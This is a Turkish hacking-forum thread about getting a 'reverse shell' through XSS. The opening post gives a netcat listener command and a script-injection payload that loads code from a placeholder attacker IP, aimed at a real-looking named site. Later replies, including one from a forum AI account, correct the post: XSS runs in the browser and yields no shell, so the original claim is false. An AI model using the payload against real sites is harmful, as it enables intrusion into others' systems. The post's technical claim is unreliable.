Hoşgeldin Misafir

XSS Açığı İle Reverse Shell

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Mr.Robot_671

10 May 2025
89 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Merhaba Değerli TurkHack Ailesi.

Bu Konumda Sizlere NetCat Aracı İle XSS Açıklı Siteye Sızmayı Göstereceğim, Umarım Konumu Beğenirsiniz Teşekkür Ederim.

Benim Hedef Sitem USA.com.

Şimdi Terminali Açıp Şu Komutu Yazalım.
Kod = nc -lnvp 4444

Şuan NetCat Aracımızı Dinlemeye Aldık Devam Edelim

USA.com Sitesine Gelip Arama Yerine Şu Kodu Yazalım.
Kod = <script>setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//your_ip:4444"}},1010)</script>

Your_İP Yazan Kısıma Kendi İP Adresimizi Yazalım.

Enter Tuşuna Bastığımızda Terminale Gelip Bağlantının Gelip Gelmediğini Kontrol Edelim.

Bağlantı Geldiyse Siteye Sızmışsınız Demektir.

İyi Forumlar Dilerim.
 

The_Exploit

4 Nis 2019
125 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Merhaba Değerli TurkHack Ailesi.

Bu Konumda Sizlere NetCat Aracı İle XSS Açıklı Siteye Sızmayı Göstereceğim, Umarım Konumu Beğenirsiniz Teşekkür Ederim.

Benim Hedef Sitem USA.com.

Şimdi Terminali Açıp Şu Komutu Yazalım.
Kod = nc -lnvp 4444

Şuan NetCat Aracımızı Dinlemeye Aldık Devam Edelim

USA.com Sitesine Gelip Arama Yerine Şu Kodu Yazalım.
Kod = <script>setInterval(function(){{with(document)body.appendChild(createElement("script")).src="//your_ip:4444"}},1010)</script>

Your_İP Yazan Kısıma Kendi İP Adresimizi Yazalım.

Enter Tuşuna Bastığımızda Terminale Gelip Bağlantının Gelip Gelmediğini Kontrol Edelim.

Bağlantı Geldiyse Siteye Sızmışsınız Demektir.

İyi Forumlar Dilerim.
bu payload modern Java script olan sitelerde çok islevsel olacağını düsünmüyorum... Yinede emek vermissin Eyw Teskkürler...
 

Sham

Sham

r00tSHAM
THS
15 Haz 2024
527 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Böyle reverse shell alınamaz. Xss dediğimiz olay server side bir açık değil client side bir açıktır. Yani verdiğin paylod sunucuda değil senin tarayıcında çalışıyor. Ncat ile dinlemeye aldığın makineye sızmak istediğin sunucu değil, sen istek göndermiş oluyorsun.
 

The_Exploit

4 Nis 2019
125 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Böyle reverse shell alınamaz. Xss dediğimiz olay server side bir açık değil client side bir açıktır. Yani verdiğin paylod sunucuda değil senin tarayıcında çalışıyor. Ncat ile dinlemeye aldığın makineye sızmak istediğin sunucu değil, sen istek göndermiş oluyorsun.
Dostum ordan burdan izledikleri videolardan etkilenip böyle konu açıyorlar reverse tcp yi anlatmaya çalısmıs ama framework kullanımından haberi yok msfconsole bilmiyorlar msfvenom dan habersiz biri video çekiyor önceden LPort dan dinlemeye almıs bir makinayı bu arkadaslar da görüyorlar sonra diyorlar ki bak bu is böyle oluyor gidip bir forumda hemen paylasmalıyım diyip gelip paylasıyorlar... reverse tcp konuda anlatıldığı gibi alınmaz payload lar anlattığı gibi atılmaz ben yazmıs diye çok üstüne düsmedim açıklama yapma gereği duymadım bariz belli bilmiyor...Payload lar Site Sahibinin Kullandığı Makinaya Atılır Ve İsletim Sistemine Göre Atılır Hangi İsletim Sistemini Kullanıyorsa Ona Göre Bir Payload Seçmek Gerekir...Ayrıca XSS Açıklı Bir Siteye JavaScript Payload ı Atmak Ne Kadar Mantıklı Olabilir....:ROFLMAO::ROFLMAO:
 
Moderatör tarafında düzenlendi:

The_Exploit

4 Nis 2019
125 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
Milattan kalmış konu sanırım
Reis Reverse Tcp Yi Anlatmaya Çalısmıs Ama Anlattığı Gibi Ncat İle Reverse Tcp Yani LPORT Olusturmak İmkansız Konuda Anlattığı Bir Adres Çubuğundan Yapılacak Seyler Değil Sql İnject Olsa Anlarım Ama Reverse Tcp Çok Farklıdır...Bilmediği Bariz Ortada O Yüzden Açıklama Yapma Gereği Duymadım... ;);)
 

THS-AI

THS-AI

THS YAPAY ZEKA
Turkhacks Kurumsal
20 Haz 2025
11,255 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
XSS açığını kullanarak reverse shell çalıştırmak mümkün değil. Bu tür saldırılara karşı, kullanıcı girdilerini düzgün şekilde sanitize edin ve içerik güvenlik politikası uygulayın. Ayrıca, güvenlik açıklarını düzenli güncellemelerle kapatın.
 
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...